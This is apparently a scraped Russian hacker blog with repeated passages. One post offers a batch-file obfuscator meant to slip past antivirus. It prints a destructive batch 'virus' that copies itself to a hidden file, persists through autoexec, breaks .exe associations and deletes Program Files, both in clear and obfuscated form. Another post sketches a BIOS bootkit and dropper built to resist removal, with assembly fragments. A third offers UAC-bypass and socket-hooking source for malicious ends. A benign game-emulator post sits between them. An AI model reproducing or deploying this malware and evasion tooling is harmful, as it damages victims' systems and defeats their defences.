воскресенье, 24 августа 2014 г.
воскресенье, 23 февраля 2014 г.
batch obfuscator\ шифрование батников.
Сел за комп вот.Еще раньше видел деобфускатор батников у kaimi, решил вот тут навоять наоборот обфускатор.Что это собсно за хрень и зачем она нужна.Ну если по простому, есть батник вида:
Поддерживается только нижний регистр (этого должно хватить)
@echo off
echo virus loading
date 13.09.96
if exist c:ski.bat goto abc
copy %0 c:ski.bat
attrib +h c:ski.bat
echo c:ski.bat >>autoexec.bat
:abc
md pridurok
md luzer
md durak
md lamer
label e: pridurok
assoc .exe=.mp3
del c:program files/q
echo virus load
echo virus loading
date 13.09.96
if exist c:ski.bat goto abc
copy %0 c:ski.bat
attrib +h c:ski.bat
echo c:ski.bat >>autoexec.bat
:abc
md pridurok
md luzer
md durak
md lamer
label e: pridurok
assoc .exe=.mp3
del c:program files/q
echo virus load
(скопирован какой-то вирус с паблика,для наглядности)
а превращается он в батник вида
rem obfuscated by SBObD
set ggxjsg=a
set hoceoi=b
set uihzkj=c
set netnof=d
set swayur=e
set qfuyih=f
set klpucr=g
set pvktyh=h
set pizeyh=i
set wyawag=j
set gaxsek=k
set ixkqqn=l
set xzsbni=m
set enxxnj=n
set jmhjlz=o
set evwjoj=p
set uvgdpz=q
set ggkavs=r
set ybbhex=s
set ygwumb=t
set eqpncb=u
set gvncwi=v
set kklkqg=w
set tkedjs=x
set xzmksq=y
set jtoqia=z
%uihzkj%%ixkqqn%%ybbhex%
@%swayur%%uihzkj%%pvktyh%%jmhjlz% %jmhjlz%%qfuyih%%qfuyih%
%swayur%%uihzkj%%pvktyh%%jmhjlz% %gvncwi%%pizeyh%%ggkavs%%eqpncb%%ybbhex% %ixkqqn%%jmhjlz%%ggxjsg%%netnof%%pizeyh%%enxxnj%%klpucr%
%netnof%%ggxjsg%%ygwumb%%swayur% 13.09.96
%pizeyh%%qfuyih% %swayur%%tkedjs%%pizeyh%%ybbhex%%ygwumb% %uihzkj%:%ybbhex%%gaxsek%%pizeyh%.%hoceoi%%ggxjsg%%ygwumb% %klpucr%%jmhjlz%%ygwumb%%jmhjlz% %ggxjsg%%hoceoi%%uihzkj%
%uihzkj%%jmhjlz%%evwjoj%%xzmksq% %0 %uihzkj%:%ybbhex%%gaxsek%%pizeyh%.%hoceoi%%ggxjsg%%ygwumb%
%ggxjsg%%ygwumb%%ygwumb%%ggkavs%%pizeyh%%hoceoi% +%pvktyh% %uihzkj%:%ybbhex%%gaxsek%%pizeyh%.%hoceoi%%ggxjsg%%ygwumb%
%swayur%%uihzkj%%pvktyh%%jmhjlz% %uihzkj%:%ybbhex%%gaxsek%%pizeyh%.%hoceoi%%ggxjsg%%ygwumb% >>%ggxjsg%%eqpncb%%ygwumb%%jmhjlz%%swayur%%tkedjs%%swayur%%uihzkj%.%hoceoi%%ggxjsg%%ygwumb%
:%ggxjsg%%hoceoi%%uihzkj%
%xzsbni%%netnof% %evwjoj%%ggkavs%%pizeyh%%netnof%%eqpncb%%ggkavs%%jmhjlz%%gaxsek%
%xzsbni%%netnof% %ixkqqn%%eqpncb%%jtoqia%%swayur%%ggkavs%
%xzsbni%%netnof% %netnof%%eqpncb%%ggkavs%%ggxjsg%%gaxsek%
%xzsbni%%netnof% %ixkqqn%%ggxjsg%%xzsbni%%swayur%%ggkavs%
%ixkqqn%%ggxjsg%%hoceoi%%swayur%%ixkqqn% %swayur%: %evwjoj%%ggkavs%%pizeyh%%netnof%%eqpncb%%ggkavs%%jmhjlz%%gaxsek%
%ggxjsg%%ybbhex%%ybbhex%%jmhjlz%%uihzkj% .%swayur%%tkedjs%%swayur%=.%xzsbni%%evwjoj%3
%netnof%%swayur%%ixkqqn% %uihzkj%:%evwjoj%%ggkavs%%jmhjlz%%klpucr%%ggkavs%%ggxjsg%%xzsbni% %qfuyih%%pizeyh%%ixkqqn%%swayur%%ybbhex%/%uvgdpz%
%swayur%%uihzkj%%pvktyh%%jmhjlz% %gvncwi%%pizeyh%%ggkavs%%eqpncb%%ybbhex% %ixkqqn%%jmhjlz%%ggxjsg%%netnof%
set ggxjsg=a
set hoceoi=b
set uihzkj=c
set netnof=d
set swayur=e
set qfuyih=f
set klpucr=g
set pvktyh=h
set pizeyh=i
set wyawag=j
set gaxsek=k
set ixkqqn=l
set xzsbni=m
set enxxnj=n
set jmhjlz=o
set evwjoj=p
set uvgdpz=q
set ggkavs=r
set ybbhex=s
set ygwumb=t
set eqpncb=u
set gvncwi=v
set kklkqg=w
set tkedjs=x
set xzmksq=y
set jtoqia=z
%uihzkj%%ixkqqn%%ybbhex%
@%swayur%%uihzkj%%pvktyh%%jmhjlz% %jmhjlz%%qfuyih%%qfuyih%
%swayur%%uihzkj%%pvktyh%%jmhjlz% %gvncwi%%pizeyh%%ggkavs%%eqpncb%%ybbhex% %ixkqqn%%jmhjlz%%ggxjsg%%netnof%%pizeyh%%enxxnj%%klpucr%
%netnof%%ggxjsg%%ygwumb%%swayur% 13.09.96
%pizeyh%%qfuyih% %swayur%%tkedjs%%pizeyh%%ybbhex%%ygwumb% %uihzkj%:%ybbhex%%gaxsek%%pizeyh%.%hoceoi%%ggxjsg%%ygwumb% %klpucr%%jmhjlz%%ygwumb%%jmhjlz% %ggxjsg%%hoceoi%%uihzkj%
%uihzkj%%jmhjlz%%evwjoj%%xzmksq% %0 %uihzkj%:%ybbhex%%gaxsek%%pizeyh%.%hoceoi%%ggxjsg%%ygwumb%
%ggxjsg%%ygwumb%%ygwumb%%ggkavs%%pizeyh%%hoceoi% +%pvktyh% %uihzkj%:%ybbhex%%gaxsek%%pizeyh%.%hoceoi%%ggxjsg%%ygwumb%
%swayur%%uihzkj%%pvktyh%%jmhjlz% %uihzkj%:%ybbhex%%gaxsek%%pizeyh%.%hoceoi%%ggxjsg%%ygwumb% >>%ggxjsg%%eqpncb%%ygwumb%%jmhjlz%%swayur%%tkedjs%%swayur%%uihzkj%.%hoceoi%%ggxjsg%%ygwumb%
:%ggxjsg%%hoceoi%%uihzkj%
%xzsbni%%netnof% %evwjoj%%ggkavs%%pizeyh%%netnof%%eqpncb%%ggkavs%%jmhjlz%%gaxsek%
%xzsbni%%netnof% %ixkqqn%%eqpncb%%jtoqia%%swayur%%ggkavs%
%xzsbni%%netnof% %netnof%%eqpncb%%ggkavs%%ggxjsg%%gaxsek%
%xzsbni%%netnof% %ixkqqn%%ggxjsg%%xzsbni%%swayur%%ggkavs%
%ixkqqn%%ggxjsg%%hoceoi%%swayur%%ixkqqn% %swayur%: %evwjoj%%ggkavs%%pizeyh%%netnof%%eqpncb%%ggkavs%%jmhjlz%%gaxsek%
%ggxjsg%%ybbhex%%ybbhex%%jmhjlz%%uihzkj% .%swayur%%tkedjs%%swayur%=.%xzsbni%%evwjoj%3
%netnof%%swayur%%ixkqqn% %uihzkj%:%evwjoj%%ggkavs%%jmhjlz%%klpucr%%ggkavs%%ggxjsg%%xzsbni% %qfuyih%%pizeyh%%ixkqqn%%swayur%%ybbhex%/%uvgdpz%
%swayur%%uihzkj%%pvktyh%%jmhjlz% %gvncwi%%pizeyh%%ggkavs%%eqpncb%%ybbhex% %ixkqqn%%jmhjlz%%ggxjsg%%netnof%
Это еще скажем простая обфускация, в батник можно добавить разного рода мусора, например так рандомное присвоение строк, или кучу запутанных goto. Однако я не стал этого делать, то шо нахер надо и так пашет)
а зачем надо вот:
(этот же батник на ВТ)
хрень конечно беспонтовая, ну та пофиг я делфю не открывал сто лет уже)
качнуть мона тут: http://splashed.ucoz.ru/SBO.rar
Поддерживаются (но не обфусцируются, в виду просто невозможности это сделать) следующие символы(возможно использовать бат-сценарии)
пробел, . - = : #39 (кавычка одинарная) / \ [ ] * >< @ % 1234567890 + ~
не отрицается наличие каких то тупорылых ошибок, хз толком не проверял, пару-тройку батников работали.
Поддерживается только нижний регистр (этого должно хватить)
интерфейс драг и дроп) просто для ленивых) в папке с прогой создастся crypted.bat
исходники?-да кому они нужны)
исходники?-да кому они нужны)
Споки ноки)))
Купил себе эту малютку))
hash tags: bat obfuscator, шифровать батник, спрятать батник, шифровальщик батников batch obfuscator download
пятница, 31 января 2014 г.
Концепция "неизлечимости" или bios троян
О том чем грозит данный вид ПО даже не хочется говорить.Несомненно, реализация и более того,осмысленность данного ПО спорная и сложная.Как нам всем известно, биосы бывают разные, АМИ,ФЕНИКСЫ и все такое прочее(хотя по статистике больше всего конечно фениксов).Но скажу что это возможно!Более того у меня получилось разместить известный буткит-фрэймворк в виртуальном биосе vmware!Что можно сделать на виртуалке то можно сделать и на реальной машине.Поебаться мне пришлось нехило, а т.е. немного модифицировать сей фреймворк таким вот кодесом:
mov di, 6000h
mov cx, 0fffh
add si,110000b
rep movsw
копируемся где-то в области bios
проверяем, включены ли уже прерывания
cmp byte [19h*4],0
если все ок запускаем код,который был потерт прыжком
mov bx, es
mov fs, bx
mov ds, ax
retf
дальше все по-дефолту
откусываем память в low bios memory
mov [ax,413h]
sub ax,6
переводим в параграфы
mov [413h],ax
shl ax,6
перехватываем прерывание и т.д. то что в фрэймворке.
когда переходим в защищенный режим,(тут я удалил все ненужное для наглядности и сделал вывод напрямую в видеобуфер)
выводим в видеобуфер посимвольно
mov word [ds:0B8000h], 0250h
в итоге смотрим что получилось в данном видео:
mov di, 6000h
mov cx, 0fffh
add si,110000b
rep movsw
копируемся где-то в области bios
проверяем, включены ли уже прерывания
cmp byte [19h*4],0
если все ок запускаем код,который был потерт прыжком
mov bx, es
mov fs, bx
mov ds, ax
retf
дальше все по-дефолту
откусываем память в low bios memory
mov [ax,413h]
sub ax,6
переводим в параграфы
mov [413h],ax
shl ax,6
перехватываем прерывание и т.д. то что в фрэймворке.
когда переходим в защищенный режим,(тут я удалил все ненужное для наглядности и сделал вывод напрямую в видеобуфер)
выводим в видеобуфер посимвольно
mov word [ds:0B8000h], 0250h
в итоге смотрим что получилось в данном видео:
Итог: конечно, возможность заразы была всегда, вспомним тот же cih. Однако, реализовывать это для полномасштабного проекта во-первых глупо,во-вторых очень тяжело(правильно поставить вперед;))
Хотя я видел одну интересную штуку:
В дропере идет драйвер устройства bios, драйвер руткит(прошивка ,полагаю возможна стандартными утилитами,а их надо ныкать это естественно), зараженный модуль( допустим такой какой я сделал),длл-ка для контроля драйвера,и то что работает с образами bios (смотря на какой биос нацелен троян, чаще всего это phoenix award и утилита cbrom)
Некоторые ебанутые дроперы используют свою шифрованную файловую систему за пределами размеченной области жд(это?!ппц) куда и сбрасывают все что несут в себе.
Потом читается bios и определяется его размер.Создается образ биоса на жд.Потом зараженный модуль вносится в этот образ,после чего образ жгется в МС.
Биос определяется по сигнатуре, например в фениксах в комплекте идет свой прошивальщик который и можно найти по его имени.
В общем то штука довольно опасная, тк убрать ее при наличии буткита или руткита режима ядра-не получится.
Да что еще хочу подчеркнуть, механизм буткитов которые опубликованы на мой взгляд не объективен.Во-первых та же windows 7 загружается уже вообще иначе чем ХРюха, а это уже продумывать как минимум два варианта.Надо идеально знать процесс загрузки операционной системы и все такое.Малейший сервиспак\обновление которые уничтожат сигнатуры которыми пользуется буткит,либо вообще принципиально изменят что то-он будет не рабочим.
Я читал и думал об отличном варианте.Ищется определенный exe-шник путем перебора сектора (сигнатура mz), и внедряется код в его заголовок.Почему в заголовок: да потому что в винде есть такая фишка как фрагментация и файл может быть не целым.Как варианта можно составить небольшой парсер файловой системы и таким образом наверняка внедряться в нужный файл.На этом все, я пошел пить пиво;)
Resident evil zero - эмуляция.
Отдыхай играя.Или что то вроде того.
На самом деле не являюсь сторонником задротства и онлайн игр, но иногда, от делать нефиг бывает играю.Играю в более интересные игры, не считая тупой стрельбы как quake или doom( и т.д. и т.п.),в продолжение того что захватило меня в детстве когда я имел playstation и playstation2, а на компе мощнее старкрафта ничего не шло).
В итоге прошел всю серию doom, quake, splinter cell, почти все metal gear solid, и resident evil. Это одна из моих любимейших вещей.И вот наткнулся я короче на resident evil remake- переделка первого РЕ на современный мотив и resident evil zero- которая, по-сути является приквелом первого РЕ и рассказывает всю историю с самого начала.Одна беда, это игры для gamecube,wii.
Со своим не слишком крутым железом на данный момент, почему то игра оооочень медленно шла на dolphin-e , порядком 20 кадров,а на загруженных локациях итого меньше.
Но мне удалось найти и сконфигурировать одну версию dolphin и теперь игруха идет плавно, провисания FPS незначительны и редки.Тут выложу конфигурацию.
Почитать об игре можно тут: http://ru.wikipedia.org/wiki/Resident_Evil_Zero
Мое железо:
core2quad q6600 2.4 GHz
nvidia ge force GTS 250 512mb 256 битная шина.
4gb DDR 3 1333MHz
windows 7 x64bit.
требуемые эмулятор:
dolphin 3.0-307
конфиг(разрешения видео устанавливайте на свое усмотрение):
скриншот игры
Всем приятной игры!
ps фанам RE- must have. игрушка-сила;)
На самом деле не являюсь сторонником задротства и онлайн игр, но иногда, от делать нефиг бывает играю.Играю в более интересные игры, не считая тупой стрельбы как quake или doom( и т.д. и т.п.),в продолжение того что захватило меня в детстве когда я имел playstation и playstation2, а на компе мощнее старкрафта ничего не шло).
В итоге прошел всю серию doom, quake, splinter cell, почти все metal gear solid, и resident evil. Это одна из моих любимейших вещей.И вот наткнулся я короче на resident evil remake- переделка первого РЕ на современный мотив и resident evil zero- которая, по-сути является приквелом первого РЕ и рассказывает всю историю с самого начала.Одна беда, это игры для gamecube,wii.
Со своим не слишком крутым железом на данный момент, почему то игра оооочень медленно шла на dolphin-e , порядком 20 кадров,а на загруженных локациях итого меньше.
Но мне удалось найти и сконфигурировать одну версию dolphin и теперь игруха идет плавно, провисания FPS незначительны и редки.Тут выложу конфигурацию.
Почитать об игре можно тут: http://ru.wikipedia.org/wiki/Resident_Evil_Zero
Мое железо:
core2quad q6600 2.4 GHz
nvidia ge force GTS 250 512mb 256 битная шина.
4gb DDR 3 1333MHz
windows 7 x64bit.
требуемые эмулятор:
dolphin 3.0-307
конфиг(разрешения видео устанавливайте на свое усмотрение):
ps фанам RE- must have. игрушка-сила;)
пятница, 10 января 2014 г.
Праздничные плюшки!
Делюсь с вами штучками и рюшечками.
1)Обход UAC (уже известным методом,для чего думаю понятно).
2)Хук сокетов(думаю тоже понятно для чего.Вообще способов применения уйма,но учитывая тематику данного блога,дам намек что это нужно что бы не юзатьшколометод с hosts.инжектора ясен пень в комплекте нету)
все написано на "С" с использованием разных библиотек(но наиболее популярных), для общего развития так-сказать)
скачать сорцы тута: source
1)Обход UAC (уже известным методом,для чего думаю понятно).
2)Хук сокетов(думаю тоже понятно для чего.Вообще способов применения уйма,но учитывая тематику данного блога,дам намек что это нужно что бы не юзать
все написано на "С" с использованием разных библиотек(но наиболее популярных), для общего развития так-сказать)
скачать сорцы тута: source
Подписаться на:
Комментарии (Atom)